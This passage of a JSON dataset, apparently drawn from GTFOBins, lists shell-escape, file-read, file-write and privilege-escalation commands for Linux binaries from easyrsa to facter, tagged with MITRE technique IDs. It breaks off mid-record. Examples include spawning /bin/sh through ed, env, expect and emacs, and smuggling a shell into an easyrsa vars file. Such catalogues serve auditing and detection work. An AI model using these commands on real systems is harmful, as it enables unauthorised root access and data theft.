the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:easyrsa:shell:0:suid","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:easyrsa:shell:0:unprivileged","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:eb:inherit:0:sudo","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eb/"]},{"id":"gtfo:eb:inherit:0:unprivileged","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eb/"]},{"id":"gtfo:ed:file-read:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-read:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-read:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:efax:file-read:0:sudo","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/efax/"]},{"id":"gtfo:efax:file-read:0:suid","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/efax/"]},{"id":"gtfo:egrep:file-read:0:sudo","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:egrep:file-read:0:suid","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:egrep:file-read:0:unprivileged","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:elvish:file-read:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-read:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-read:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"elvish -c 'print (slurp </path/to/input-file)'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:file-write:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"elvish -c 'print DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:sudo","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:suid","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:elvish:shell:0:unprivileged","toolId":"gtfo:elvish","toolName":"elvish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"elvish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/elvish/"]},{"id":"gtfo:emacs:file-read:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-read:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"emacs /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-write:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:file-write:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"emacs /path/to/output-file\nDATA\nC-x C-s","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:shell:0:sudo","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:emacs:shell:0:unprivileged","toolId":"gtfo:emacs","toolName":"emacs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"emacs -Q -nw --eval '(term \"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/emacs/"]},{"id":"gtfo:enscript:shell:0:sudo","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:enscript:shell:0:suid","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:enscript:shell:0:unprivileged","toolId":"gtfo:enscript","toolName":"enscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"enscript /dev/null -qo /dev/null -I '/bin/sh >&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/enscript/"]},{"id":"gtfo:env:shell:0:sudo","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:env:shell:0:suid","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"env /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:env:shell:0:unprivileged","toolId":"gtfo:env","toolName":"env","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"env /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/env/"]},{"id":"gtfo:eqn:file-read:0:sudo","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:eqn:file-read:0:suid","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:eqn:file-read:0:unprivileged","toolId":"gtfo:eqn","toolName":"eqn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"eqn /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eqn/"]},{"id":"gtfo:espeak:file-read:0:sudo","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:espeak:file-read:0:suid","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:espeak:file-read:0:unprivileged","toolId":"gtfo:espeak","toolName":"espeak","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"espeak -qXf /path/to/input-file","description":"The file content appears in the middle of other textual information as phonemes.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/espeak/"]},{"id":"gtfo:ex:inherit:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:inherit:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:inherit:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"inherit ← ed","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:ed"],"command":"ex","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:sudo","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:suid","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:ex:shell:0:unprivileged","toolId":"gtfo:ex","toolName":"ex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ex -c ':!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ex/"]},{"id":"gtfo:exiftool:file-read:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-read:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file\ncat /path/to/output-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -filename=/path/to/output-file /path/to/input-file","description":"If the permissions allow it, files are moved (instead of copied) to the destination.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:1:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:1:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description<=/path/to/input-file --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:2:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:2:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool \"-description=DATA --filename /path/to/output-file","description":"The output file must exists, either empty or be a supported image file. The content is written amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:3:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:file-write:3:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"exiftool -description -W /path/to/output-file --filename /path/to/input-file","description":"Writes the metadata tags of the input file in textual format to the output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:inherit:0:sudo","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:exiftool:inherit:0:unprivileged","toolId":"gtfo:exiftool","toolName":"exiftool","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"exiftool -if '...' /etc/passwd","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/exiftool/"]},{"id":"gtfo:expand:file-read:0:sudo","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expand:file-read:0:suid","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expand:file-read:0:unprivileged","toolId":"gtfo:expand","toolName":"expand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expand /path/to/input-file","description":"The read file content is corrupted by replacing tabs with spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expand/"]},{"id":"gtfo:expect:file-read:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:file-read:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:file-read:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"expect /path/to/input-file","description":"The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:sudo","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:suid","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh -p;interact'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:expect:shell:0:unprivileged","toolId":"gtfo:expect","toolName":"expect","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"expect -c 'spawn /bin/sh;interact'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/expect/"]},{"id":"gtfo:facter:inherit:0:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:0:unprivileged","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"FACTERLIB=/path/to/dir/ facter","description":"The first `.rb` file in the `/path/to/dir/` directory will be executed.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/facter/"]},{"id":"gtfo:facter:inherit:1:sudo","toolId":"gtfo:facter","toolName":"facter","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"facter --custom-dir=/path/to/dir/ x","description":"The first `.rb` file in the `/path/to/dir/` directory will be 